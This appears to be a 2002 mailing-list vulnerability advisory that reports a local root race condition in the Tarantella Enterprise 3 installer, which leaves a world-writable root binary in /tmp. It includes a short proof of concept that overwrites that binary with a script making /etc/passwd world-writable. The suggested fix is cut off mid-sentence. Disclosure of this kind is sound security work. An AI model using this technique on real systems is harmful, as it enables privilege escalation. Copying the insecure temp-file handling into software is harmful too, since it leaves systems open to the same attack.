Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: Larry W. Cashdollar (lwcvapid.dhs.org)
Date: Sat Jan 26 2002 - 08:46:34 CST
-----BEGIN PGP SIGNED MESSAGE-----
Larry W. Cashdollar
Vulnerability report for Tarantella Enterprise 3.
1. local root compromise during installation:
The installation script provided with tarentella handles utility
packages during installation insecurely. A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.
$ ls -l /tmp/gunzip16152
- -rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152
gunzip is extracted:
extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE
The permissions of gunzip are changed to rwx for all:
chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
extract $efilename | $TMP_GUNZIP -q > "$efilename"
There is a race condition between when gunzip is extracted and used during
installation. At which time a malicious local user could inject code to
compromise the system quickly.
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unpriviledged user.
Perhaps create a directory in /tmp or /var/tmp and use that directory as a
4. Software: Tarantella Enterprise 3
Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org
-----END PGP SIGNATURE-----